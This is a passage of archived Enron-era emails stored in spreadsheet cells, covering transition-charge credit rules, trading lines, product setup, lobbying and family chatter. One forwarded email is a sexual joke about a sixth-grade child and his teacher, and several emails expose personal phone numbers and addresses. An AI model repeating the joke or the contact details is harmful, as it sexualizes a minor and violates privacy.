Transition Charges: (Art 4.5 of the Tariff, Schedule TC to the Tariff, and Chapter 25.108 of the  Rules). _x000D_
1. For TDSPs that are subject to a PUC financing order (Reliant, TXU and CP&amp;L), EES will bill and collect (on behalf of the bond servicer) transition charges from its (EES's) customers_x000D_
_x000D_
2. Payments of transition charges to the servicer are due from EES 35 calendar days from bill date with a 10 day grace period._x000D_
_x000D_
3.  EES is required to provide seperate security for transition charges. _x000D_
_x000D_
4.  EES must have and maintain a long term unsecured credit rating of not less than BBB- or Baa3 from Moody's or S&amp;P, or provide_x000D_
	- a cash deposit of 2 months maximum expected transition charge collections_x000D_
	- an affiliate parent guaranty, surety bond, or LC for the 2 month amount_x000D_
	- or a combination of the above._x000D_
_x000D_
5. EES is not rated, so technically we may be required to provide the security today. If such a request is made, a parental guaranty from Enron corp will suffice, given our current rating of BBB and Baa2 by Moody's and S&amp; P._x000D_
_x000D_
6. If Enron Corp is downgraded below BBB or Baa3, that will trigger a request for deposit or other security._x000D_
_x000D_
7. Upon request for a security for transition charges, EES must provide required security within 10 calendar days._x000D_
_x000D_
8. Upon failure to provide or maintain required security, the consequences outlined in the previous section will result._x000D_
_x000D_
9. To avoid all these, EES could contract with the TDSP to bill and collect transition customers fro EES's customers.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 02:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: Christmas</t>
  </si>
  <si>
    <t>Hi E,_x000D_
_x000D_
Let me know what you get and are you spending the night tomorrow night?_x000D_
Jake is having surgery tomorrow morning so say a prayer for him. LU-M_x000D_
----- Original Message -----_x000D_
From: "Bass, Jason" &lt;Jason.Bass2@COMPAQ.com&gt;_x000D_
To: "'K. Bass'" &lt;daphneco64@bigplanet.com&gt;_x000D_
Sent: Monday, November 27, 2000 10:40 AM_x000D_
Subject: RE: Christmas_x000D_
_x000D_
_x000D_
&gt; Black Dress shoes size 10_x000D_
&gt; Dress socks and White socks_x000D_
&gt; Boxers XL_x000D_
&gt;_x000D_
&gt; http://www.bestbuy.com/detail.asp?e=11000015_x000D_
&gt; &lt;http://www.bestbuy.com/detail.asp?e=11000015&amp;m=1&amp;cat=3&amp;scat=4&gt;_x000D_
&gt; &amp;m=1&amp;cat=3&amp;scat=4_x000D_
&gt;_x000D_
&gt; http://www.bestbuy.com/detail.asp?e=11008650_x000D_
&gt; &lt;http://www.bestbuy.com/detail.asp?e=11008650&amp;m=488&amp;cat=511&amp;scat=514&gt;_x000D_
&gt; &amp;m=488&amp;cat=511&amp;scat=514_x000D_
&gt;_x000D_
&gt; http://www.bestbuy.com/detail.asp?e=11008607_x000D_
&gt; &lt;http://www.bestbuy.com/detail.asp?e=11008607&amp;m=488&amp;cat=516&amp;scat=517&gt;_x000D_
&gt; &amp;m=488&amp;cat=516&amp;scat=517_x000D_
&gt;_x000D_
&gt; http://www.express.com/consumer/products_movies_fr.asp?ProductNumber=17551_x000D_
&gt;_x000D_
&lt;http://www.express.com/consumer/products_movies_fr.asp?ProductNumber=17551&amp;_x000D_
&gt; No_Catalog=X&amp;Type=Movie&gt; &amp;No_Catalog=X&amp;Type=Movie_x000D_
&gt;_x000D_
&gt; http://www.express.com/consumer/products_movies_fr.asp?ProductNumber=19161_x000D_
&gt;_x000D_
&lt;http://www.express.com/consumer/products_movies_fr.asp?ProductNumber=19161&amp;_x000D_
&gt; No_Catalog=X&amp;Type=Movie&gt; &amp;No_Catalog=X&amp;Type=Movie_x000D_
&gt;_x000D_
&gt; IF you need anymore let me know :-)_x000D_
&gt;_x000D_
&gt; Donnita likes Christian stuff and roosters obviously.  I don't know what_x000D_
to_x000D_
&gt; get her myself.  She really needs a ski jacket.  So, if you would like to_x000D_
&gt; give her an early present that would be nice as well.  Actually any jacket_x000D_
&gt; that might be more universally useful would be good too._x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: K. Bass [mailto:daphneco64@bigplanet.com]_x000D_
&gt; Sent: Monday, November 27, 2000 9:43 AM_x000D_
&gt; To: Bass, Jason; Eric Bass_x000D_
&gt; Subject: Christmas_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Hi Boys,_x000D_
&gt;_x000D_
&gt; I REALLY need your lists asap.  Will you oblige soon?  LU-M_x000D_
&gt;</t>
  </si>
  <si>
    <t>Fri, 7 Dec 2001 19:09:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edwinfitts@hotmail.com'})</t>
  </si>
  <si>
    <t>Fwd: FW: Why cows hate snow.....?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 - damnsnow.mpe </t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 10:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Fimat</t>
  </si>
  <si>
    <t xml:space="preserve">fine_x000D_
_x000D_
_x000D_
From: Sarah Wesner/ENRON@enronXgate on 01/22/2001 03:17 PM_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fimat_x000D_
_x000D_
John - do you mind sharing your Fimat line with the crude traders?  Current _x000D_
usage is about $6 million.  Also Warren thought that he might be able to _x000D_
change the variation limit from about $10 million to $6 million.  This change _x000D_
would allow us to use the line for $14 million for original margin (they have _x000D_
a good rate.)  Warren is going to call you about it.  Sarah_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 11:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Run Hour Assumptions - Fort Pierce</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
_x000D_
Jennifer Bagwell_x000D_
Enron Americas - Southeast Power Origination_x000D_
1400 Smith Street, Houston, TX 77002_x000D_
Room 3111A_x000D_
Phone: 713-345-4947_x000D_
Fax: 713-646-4940_x000D_
jennifer.bagwell@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 10:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>pager 888.916.7184_x000D_
cell 415.505.6633</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 06:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ep blanco avg</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Tori Kuykendall/HOU/ECT on 04/27/2001 _x000D_
01:40 PM ---------------------------_x000D_
_x000D_
_x000D_
Tori Kuykendall_x000D_
04/23/2001 11:51 AM_x000D_
To: Melba Lozano/ENRON@enronXgate @ ENRON_x000D_
cc:  _x000D_
Subject: RE: ep blanco avg  _x000D_
_x000D_
lets start on the 30th -- monday -- that way we can start it for may 1st _x000D_
trades._x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 09:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kelly.lombardi@enron.com', 'tom.moran@enron.com', 'tana.jones@enron.com', 'karen.lambert@enron.com'})</t>
  </si>
  <si>
    <t>New Product Type (US Gas Financial Spread)</t>
  </si>
  <si>
    <t xml:space="preserve">New Product Type (US ResiOil Swap)_x000D_
_x000D_
Tana/Karen:_x000D_
_x000D_
The product long description below will fall under the new product type US _x000D_
Gas Fin Spread.  Credit (Tom Moran) has approved copying the profiles for the _x000D_
new product type from the following:_x000D_
_x000D_
US Gas Fin Swap_x000D_
_x000D_
Please respond by 3p.m. on Tuesday, February 27._x000D_
_x000D_
Thank you._x000D_
Stephanie_x000D_
---------------------- Forwarded by Stephanie Sever/HOU/ECT on 02/26/2001 _x000D_
05:41 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kevin Meredith @ ENRON                           02/21/2001 03:46 PM_x000D_
	_x000D_
_x000D_
To: Matthew Adams/Corp/Enron@ENRON_x000D_
cc: Lisa Lees/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tara _x000D_
Sweitzer/HOU/ECT@ECT, Dawn C Kenne/HOU/ECT@ECT, Torrey Moorer/HOU/ECT@ECT, _x000D_
Matthew F Gockerman/HOU/ECT@ECT, Robert B Cass/HOU/ECT@ECT, Melba _x000D_
Lozano/HOU/ECT@ECT, Chris Walker/HOU/ECT@ECT _x000D_
Subject: Need a Sigma Factor - US Gas Financial Spread_x000D_
_x000D_
Please provide a Sigma Factor for the following product._x000D_
_x000D_
Thanks._x000D_
_x000D_
US Gas Fin Spread Nymex Spread Mar-Apr01 USD/MM_x000D_
_x000D_
_x000D_
A financial Spread Transaction with Enron North America Corp. which will _x000D_
generate a Transaction on each of two Products, under which either (A) for _x000D_
the case in which Counterparty submits an offer to buy from Enron, _x000D_
Counterparty shall buy the First Product and sell the Second Product, each in _x000D_
respect of the Notional Quantity per Determination Period; or (B) for the _x000D_
case in which Counterparty submits an offer to sell to Enron, Counterparty _x000D_
shall sell the First Product and buy the Second Product, each in respect of _x000D_
the Notional Quantity per Determination Period. The fixed price for the First _x000D_
Product will be the midpoint of its bid and offer price at the time of the _x000D_
Transaction. The fixed price for the Second Product will be the midpoint of _x000D_
the bid/offer of the First Product, modified by the price submitted by the _x000D_
Counterparty on the Website. The Notional Quantity per Determination Period _x000D_
for the Transactions on both the First Product and the Second Product is the _x000D_
volume submitted by the Counterparty via the Website. The Payment Date for _x000D_
each transaction will be 5 business days after the relevant Floating Price is _x000D_
determinable.  The Floating Price for each Transaction shall be the average _x000D_
of the Index for each day in the relevant Determination Period._x000D_
For the purposes of this Transaction, the Determination Period for the First _x000D_
Product shall correspond to the first date which appears above. The _x000D_
Determination Period for the Second Product shall correspond to the second _x000D_
date which appears above._x000D_
The Index for each transaction shall be the settlement price for the last _x000D_
scheduled Trading Day of the NYMEX Henry Hub Natural Gas Futures Contract for _x000D_
the applicable Determination Period._x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
The unit of measure against which the volume is shown shall be 10,000 MMBtu's _x000D_
per day._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 18:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'traci.rainbow@enron.com'})</t>
  </si>
  <si>
    <t>Enron Corp. 2000 Annual Report</t>
  </si>
  <si>
    <t xml:space="preserve">Please verify numbers._x000D_
_x000D_
Thanks_x000D_
Tracy_x000D_
_x000D_
---------------------- Forwarded by Tracy Geaccone/GPGFIN/Enron on 01/30/20=_x000D_
01 02:33 PM ---------------------------_x000D_
_x000D_
 =09Dortha Gray 01/30/2001 10:46 AM =09_x000D_
_x000D_
To:=09Gregory Adams/Corp/Enron@ENRON, Carolyn Barrett/Enron Communications@=_x000D_
Enron Communications, Kevin Hughes/HOU/EES@EES, Richard Causey/Corp/Enron@E=_x000D_
NRON, Bob Chandler/ET&amp;S/Enron@ENRON, Fernley Dyson/LON/ECT@ECT, Stephanie H=_x000D_
arris/Corp/Enron@ENRON, Jill Erwin/HOU/ECT@ECT, Tracy Geaccone/GPGFIN/Enron=_x000D_
@ENRON, Dave Gunther/NA/Enron@Enron, Ben Glisan/HOU/ECT@ECT, Rod Hayslett/F=_x000D_
GT/Enron@ENRON, Robert Hermann/Corp/Enron@ENRON, ron_w_johnson@pgn.com, Mar=_x000D_
k Koenig/Corp/Enron@ENRON, Mark E Lindsey/GPGFIN/Enron@ENRON, Greek Rice/Co=_x000D_
rp/Enron@ENRON, Paula Rieker/Corp/Enron@ENRON, Rex Rogers/Corp/Enron@Enron,=_x000D_
 Richard B Sanders/HOU/ECT@ECT, Sharron Westbrook/Corp/Enron@ENRON, Robert =_x000D_
C Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Robert Eickenroht/Corp/Enro=_x000D_
n@ENRON, Charles Cheek/Corp/Enron@ENRON, Kathryn Corbally/Corp/Enron@ENRON,=_x000D_
 Georgeanne Hodges/HOU/ECT@ECT, Kerrie Smith/Corp/Enron@ENRON, kirk_stevens=_x000D_
@pgn.com, Mark Palmer/Corp/Enron@ENRON, Scott Vonderheide/Corp/Enron@ENRON,=_x000D_
 Tim DeSpain/HOU/ECT@ECT, Wade Stubblefield/HOU/EES@EES, Kent Castleman/NA/=_x000D_
Enron@Enron, Keith Marlow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jeffrey E So=_x000D_
mmers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Carol Howes/ENRON_DEVELOPMENT@EN=_x000D_
RON_DEVELOPMENT, Howard Selzer/Corp/Enron@ENRON, Wes Colwell/HOU/ECT@ECT, R=_x000D_
yan Siurek/Corp/Enron@ENRON, Davis Maxey/Corp/Enron@ENRON, Kimberly Scardin=_x000D_
o/AA/Corp/Enron@ENRON, Christopher Herbold/AA/Corp/Enron@ENRON, Eric McKee/=_x000D_
AA/Corp/Enron@ENRON, Michael K Patrick/NA/Enron@Enron, AnnMarie Tiller/Corp=_x000D_
/Enron@ENRON, Thomas Myers/HOU/ECT, Brent A Price/HOU/ECT@ECT, Jordan Mintz=_x000D_
/HOU/ECT@ECT, Robert Wilcott/Corp/Enron@ENRON, Elizabeth Ivers/NA/Enron@Enr=_x000D_
on, Sally Beck/HOU/ECT@ECT, Eugenio Perez/HOU/ECT@ECT, Dana Lee/HOU/EES@EES=_x000D_
, Mike Morrison/NA/Enron@Enron, Melissa Allen/LON/ECT@ECT, Claire Wright/LO=_x000D_
N/ECT@ECT, Gordon McKillop/NA/Enron@ENRON_x000D_
cc:=09=20_x000D_
_x000D_
Subject:=09Enron Corp. 2000 Annual Report_x000D_
_x000D_
Attached is the initial draft of the Enron Corp. 2000 Annual Report financi=_x000D_
al information.  Please review this draft and return any comments to Gary P=_x000D_
eng, Ext. 3-6841, no later than 5:00 p.m. on Thursday, February 1._x000D_
_x000D_
The focus this week will be to complete the respective Outlook sections and=_x000D_
 to finalize footnote disclosures.  Please submit any annual report informa=_x000D_
tion that is still outstanding from your business units.  Due to the accele=_x000D_
rated schedule, any assistance would be greatly appreciated._x000D_
_x000D_
_x000D_
 =09=20_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 02:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re:Questions you requested</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mary Hain/HOU/ECT on 02/01/2001 10:15 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Cynthia Sandherr@ENRON_x000D_
02/01/2001 07:35 AM_x000D_
To: Linda Robertson/NA/Enron@ENRON, Joe Hartsoe/Corp/Enron@ENRON, Tom _x000D_
Briggs/NA/Enron@Enron_x000D_
cc: Mary Hain/HOU/ECT@ECT _x000D_
Subject: Re:Questions you requested_x000D_
_x000D_
Linda:  do you want Dan Watkiss to be involved with the drafting also?_x000D_
----- Forwarded by Cynthia Sandherr/Corp/Enron on 02/01/2001 10:39 AM -----_x000D_
_x000D_
	Cynthia Sandherr_x000D_
	02/01/2001 10:34 AM_x000D_
		_x000D_
		 To: Joshua_Sheinkman@wyden.senate.gov (Joshua Sheinkman)_x000D_
		 cc: _x000D_
		 Subject: Re:Questions you requested_x000D_
_x000D_
Joshua:    Your boss did a great job yesterday and I thought the exchange _x000D_
between Steve Kean and he was very effective.  We would love to work with you _x000D_
and would be happy to draft some legislative language for your consideration _x000D_
which would address the issue.  Plus, I can be helpful in gaining bipartisan _x000D_
support for the provision.  Have you discussed this with Valerie at all?  _x000D_
Since Tim Beldon in our Oregon office has met with Ronnie Euchas on _x000D_
disclosure, I want to include him on the drafting.  Thus, it might take me a _x000D_
day or two longer to get something to you.  Hopefully, I can have something _x000D_
drafted by Monday and I'll call you to see if I can come up and meet with you _x000D_
to discuss the draft lanuage, strategy, next steps, etc.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
	Joshua_Sheinkman@wyden.senate.gov (Joshua Sheinkman)_x000D_
	02/01/2001 10:03 AM_x000D_
		 _x000D_
		 To: Cynthia.Sandherr@enron.com_x000D_
		 cc: _x000D_
		 Subject: Re:Questions you requested_x000D_
_x000D_
_x000D_
Cynthia,_x000D_
_x000D_
Thanks for getting me the Q&amp;As for the hearing.  Senator Wyden is interested _x000D_
in_x000D_
following up on the issue of electricity information disclosure and would like_x000D_
to work with Enron on this.  I would appreciate any input you could provide on_x000D_
how best to go about this through legislation, what sort of information should_x000D_
be disclosed, to whom and when, whether financial information as well as_x000D_
operating information should be included, and any suggestions for a Republican_x000D_
on the Committee who you think would be good for Senator Wyden to work with on_x000D_
legislation._x000D_
_x000D_
Thanks again for your help and I look forward to working with you further on_x000D_
this._x000D_
_x000D_
- Joshua_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 02:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Our recommendations on possible FERC Commissioners for Ken's next discussion _x000D_
with Cheney._x000D_
----- Forwarded by Steven J Kean/NA/Enron on 12/19/2000 10:27 AM -----_x000D_
_x000D_
	Allison Navin_x000D_
	12/19/2000 08:57 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: Richard Shapiro/NA/Enron@Enron, Linda Robertson/NA/Enron@ENRON_x000D_
		 Subject: FERC Commissioner_x000D_
_x000D_
Per your request._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 10:30:34 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: ENA Upstream deals to move</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Richardson, Stacey  _x000D_
Sent:	Friday, January 18, 2002 12:05 PM_x000D_
To:	Gossett, Jeffrey C.; Palmer, B. Scott_x000D_
Cc:	Theriot, Kim S.; Hall, Bob M; Wallumrod, Ellen; Balfour-Flanagan, Cyndie; Elledge, Susan; Anderson, Bridgette_x000D_
Subject:	ENA Upstream deals to move_x000D_
_x000D_
With the bankruptcy filing of ENA Upstream yesterday, please find a listing of auto-terminating deals that need to be moved into the bankruptcy books. _x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Thanks,_x000D_
SBR x30569_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 10:48:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'patricia_cuero@dell.com'})</t>
  </si>
  <si>
    <t>RE: Houston</t>
  </si>
  <si>
    <t xml:space="preserve">Hey, I may be in Houston after I get back from Alaska.  I'll let you know_x000D_
and hope to be able to see you guys!_x000D_
_x000D_
The rumor is that Mark is going to be moving back to Houston.  He is now_x000D_
interviewing with companies out there! Lucky you! ;o)_x000D_
_x000D_
Later, Patricia_x000D_
_x000D_
-----Original Message-----_x000D_
From: Gerald.Nemec@enron.com [mailto:Gerald.Nemec@enron.com]_x000D_
Sent: Wednesday, June 20, 2001 11:05 AM_x000D_
To: IMCEANOTES-Patricia+5FCuero+40Dell+2Ecom+40ENRON@enron.com_x000D_
Subject: RE: Houston_x000D_
_x000D_
_x000D_
  We flew into Shanghai and explored for 2 days.  Next we went to Qingdao_x000D_
for 3 days and finally spent 5 days in Beijing.  I would have to say that_x000D_
Beijing was the highlight of the trip.  The Great Wall was pretty_x000D_
incredible.  Should have some pics shortly._x000D_
_x000D_
Work is going well! Way to busy for my taste.  That's what I get for being_x000D_
out of the office for two weeks.  I got a voice mail from Mark while I was_x000D_
in China.  He was at the airport here in Houston looking for a ride._x000D_
Typical Mark.  Any plans on coming to Houston anytime?_x000D_
_x000D_
Gerald_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   Patricia_Cuero@Dell.com@ENRON_x000D_
_x000D_
[mailto:IMCEANOTES-Patricia+5FCuero+40Dell+2Ecom+40ENRON@ENRON.com]_x000D_
   Sent:   Tuesday, June 19, 2001 2:53 PM_x000D_
   To:     Nemec, Gerald_x000D_
   Subject:  RE: Houston_x000D_
_x000D_
   Gerald, glad to hear that you had a wonderful time in China.  What_x000D_
   cities_x000D_
   did you visit?  If you have any pics on the web let me know._x000D_
_x000D_
   Austin still treating me well.  I could complain but it would not help._x000D_
   Work is keeping me busy and I am entering triathlon season, helping my_x000D_
   brother run the restaurant and working on a new relationship.   A girl_x000D_
   has_x000D_
   to keep her plate full! ;o)_x000D_
   What about you?  How is the law?  Dave told me about his new Colombian_x000D_
   connection!_x000D_
_x000D_
   Later, Patricia_x000D_
_x000D_
   -----Original Message-----_x000D_
   From: Gerald.Nemec@enron.com [mailto:Gerald.Nemec@enron.com]_x000D_
   Sent: Tuesday, June 19, 2001 11:00 AM_x000D_
   To: IMCEANOTES-Patricia+5FCuero+40Dell+2Ecom+40ENRON@enron.com_x000D_
   Subject: RE: Houston_x000D_
_x000D_
_x000D_
_x000D_
   Hi Pat,  Fortunately I was out of the country when all the flooding_x000D_
   occurred and my house sustained no damage.  Just spent two weeks in_x000D_
   China_x000D_
   and the sights were pretty amazing.  How are things in Austin?_x000D_
_x000D_
_x000D_
       -----Original Message-----_x000D_
      From:   Patricia_Cuero@Dell.com@ENRON_x000D_
_x000D_
   [mailto:IMCEANOTES-Patricia+5FCuero+40Dell+2Ecom+40ENRON@ENRON.com]_x000D_
_x000D_
_x000D_
      Sent:   Monday, June 18, 2001 6:24 PM_x000D_
      To:     dedeutsch@duke-energy.com; Nemec, Gerald_x000D_
      Subject:  Houston_x000D_
_x000D_
_x000D_
      Dave  and Gerald,_x000D_
_x000D_
      I just  wanted to say hi and see how you were doing.  Did the flood_x000D_
   give_x000D_
      you any  problems?  I hope all is well._x000D_
_x000D_
      Thanks,_x000D_
      Patricia Cuero_x000D_
      Bus Ops, Program Manager_x000D_
      (512) 723-6977_x000D_
      (800)  289-3355 ext.  36977_x000D_
      (512)  725-2453 fax_x000D_
      The Law of  Expression: "Be sure to talk about the things you want,_x000D_
   and_x000D_
      refuse  to talk about the things you don't want."_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Feb 2002 05:22:25 -0800 (PST)</t>
  </si>
  <si>
    <t>Don't know either, but the way the question was asked was very complimentary towards what you add here.  I'll make sure things settle down, at least regarding this issue, here on 40._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Corman, Shelley &lt;Shelley.Corman@ENRON.com&gt;_x000D_
To: Hotte, Steve &lt;Steve.Hotte@ENRON.com&gt;_x000D_
Sent: Mon Feb 25 21:48:37 2002_x000D_
Subject: Re: _x000D_
_x000D_
I don't know who/what got everything stirred up today.  It is true I have other offers, but none are new -- I've been thinking about them for several weeks and haven't made up my mind.  I'll let you know when I figure it out!_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 05:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re:BF good case memo</t>
  </si>
  <si>
    <t>What did you just wake up.  It is due today and it is worth 98% of our_x000D_
grade!!!!!!!!!!!!!!!_x000D_
_x000D_
_x000D_
No next week.  I have a take home midterm to work on this coming weekend_x000D_
and wanted to get a head start on this one._x000D_
We can talk about it tonight._x000D_
_x000D_
Dylan_x000D_
_x000D_
_x000D_
_x000D_
At 02:39 PM 03/12/01 -0600, you wrote:_x000D_
_x000D_
&gt;Dylan:  Don't kill me.  Is this case due today or next Monday?</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 06:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: whas' up!!!!!</t>
  </si>
  <si>
    <t xml:space="preserve">Thought you might enjoy......._x000D_
_x000D_
_x000D_
_x000D_
 - Grandm~1_1.mpg_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Aug 1999 04:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'btlucek@prodigy.net', 'charles.smith@alcoa.com'})</t>
  </si>
  <si>
    <t>????Suicide????</t>
  </si>
  <si>
    <t>A Sixth Grade student has a penis so large, his parents warn him not to have _x000D_
anything to do with girls.  They caution him he could easily kill someone.  _x000D_
Through the grapevine, his teacher learns about his unusual size, keeps him _x000D_
after school and suggests they have sex.  He refuses expressing concern he _x000D_
might kill her.   She laughs and scoffs at the idea and says she will elect _x000D_
to be on top, in complete control, and nothing bad can happen.  He _x000D_
reluctantly agrees but the teacher experiences such wonderful sensations, she _x000D_
faints from pure joy.  Thinking he's killed her, the student runs from the _x000D_
class room sobbing and crying, "Oh my God!... I killed her!  I killed her!"  _x000D_
All at once he stops dead in his tracks, and a look of dawning comprehension _x000D_
appears on his face as he says,... "Wait just a minute!  I didn't kill her.  _x000D_
She committed suicide!"</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 07:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Sara,_x000D_
_x000D_
According to Mahesh, the London equity trading agent entity (Enron Investment _x000D_
Services, "EIS") has been established.  Therefore, once the agency agreement _x000D_
language between EIS and ECT Investments has been finalized we should be able _x000D_
to begin trading in London.  Instinet, Autex and ITG/Posit are all very _x000D_
important to our process and, where necessary, we need to get agreements _x000D_
between EIS and the vendors executed as soon as possible.  Who will be our _x000D_
contact in Legal regarding all of these agreements in your absence?_x000D_
_x000D_
Thanks and regards,_x000D_
John  _x000D_
_x000D_
_x000D_
From: Sara Shackleton on 10/04/2000 06:32 PM_x000D_
To: Gary Hickerson/HOU/ECT@ECT, Sheila Glover/HOU/ECT@ECT, Laurel _x000D_
Adams/HOU/ECT@ECT, Jorge A Garcia/NA/Enron@Enron, Clint _x000D_
Freeland/Corp/Enron@Enron, Jeff Nogid/HOU/ECT@ECT, Larry Joe _x000D_
Hunter/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Tanya _x000D_
Rohauer/HOU/ECT@ECT, Edward Sacks/Corp/Enron@Enron, John Greene/LON/ECT@ECT, _x000D_
Scott Sefton/HOU/ECT@ECT, Ryan Siurek/Corp/Enron@ENRON, William _x000D_
Stuart/HOU/ECT@ECT, Melissa Ann Murphy/HOU/ECT@ECT, Gordon _x000D_
McKillop/NA/Enron@ENRON, Julia H Chin/NA/Enron@Enron, Ellen _x000D_
Su/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: vacation_x000D_
_x000D_
I will be on vacation from October 6- 13.  Also, the ENA lawyers will be _x000D_
offsite October 5 and 6._x000D_
Should you need assistance during my absence, please contact my assistant _x000D_
Kaye Ellis at Ext. 35968 who will direct you to a lawyer._x000D_
Thanks.  Sara_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Sep 2001 19:09:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron and United Way's Continued Partnership</t>
  </si>
  <si>
    <t>_x000D_
Last month all of your donations helped Enron raise a grand total of $6 million for the United Way, including our corporate match.  Once again Enron employees made a difference and contributed more than any other pacesetter company in Houston. Also, congratulations to Elaine Brown with Enron Global Markets who won the drawing for two round-trip airline tickets for participating in this year's campaign.  Thanks to everyone at Enron for your generosity!_x000D_
_x000D_
This week Enron and the United Way of the Texas Gulf Coast have entered in to yet another exciting partnership. Beginning with the Astros vs Giants game on Tuesday, October 2, one of Enron's primary signs at Enron Field will feature the United Way logo alongside the Enron logo._x000D_
_x000D_
The decision to include United Way's logo on the sign marks the first time in history that a naming rights partner is sharing exposure on one of its primary in-stadium signage locations with a non-profit partner.  This sign is also a free, innovative way to demonstrate Enron's support of the United Way and promote the agency's role in our community._x000D_
_x000D_
The millions of fans who attend Astros games each season will see the sign.  Be sure to look for this history-making sign hanging high above the outfield.</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 09:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.jesus@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kimberly.friddle@enron.com', 'steve.venturatos@enron.com', 'james.scribner@enron.com', 'jacqueline.jackson@enron.com', 'bruce.harris@enron.com', 'seung.oh@enron.com', 'cecilia.olvera@enron.com', 'vanessa.schulte@enron.com', 'akasha.bibb@enron.com', 'stacey.white@enron.com', 'daren.farmer@enron.com', 'linda.bryan@enron.com', 'jeff.kinneman@enron.com', 'kim.theriot@enron.com', 'russ.severson@enron.com', 'chetan.paipanandiker@enron.com', 'bethanne.slaughter@enron.com', 'donna.greif@enron.com', 'vincent.wagner@enron.com', 'kimberly.olinger@enron.com', 'martha.stevens@enron.com', 'edward.terry@enron.com', 'gillian.johnson@enron.com', 'thresa.allen@enron.com', 'bryce.baxter@enron.com', 'rita.wynne@enron.com', 'shona.wilson@enron.com', 'darron.giron@enron.com', 'robert.superty@enron.com', 'randall.gay@enron.com', 'bill.hare@enron.com', 'jenny.latham@enron.com', 'craig.chaney@enron.com', 'jeffrey.gossett@enron.com', 'john.haggerty@enron.com', 'victor.lamadrid@enron.com', 'katherine.kelly@enron.com', 'mary.smith@enron.com', 'michael.eiben@enron.com', 'diane.cook@enron.com', 'sheri.thomas@enron.com', 'george.zivic@enron.com', 'george.smith@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>New Hire Orientation</t>
  </si>
  <si>
    <t xml:space="preserve">Effective May 6, 2001, New Hire Orientation will go from a day program to _x000D_
half a day. The New Hire Orientation will start at 8:00 am and end at 12:00 _x000D_
pm. The new hires will no longer be given lunch. This change was initiated as _x000D_
a result of cost cutting measures. _x000D_
_x000D_
We will be distributing the Inside Track at Sally Beck's next staff meeting _x000D_
scheduled for 5/14/01. This is an additional tool you can use to integrate _x000D_
the employee to your business unit. The Inside Track is a supplement to the _x000D_
handouts the new hires receive at orientation. It contains: general _x000D_
information, Windows 2000, Microsoft Outlook, PRC process and the business _x000D_
unit training expectations. We suggest personally greeting and delivering the _x000D_
Inside Track and taking your new hire out to lunch. If this is not possible _x000D_
we recommend sending a representative. We feel this would be a great way to _x000D_
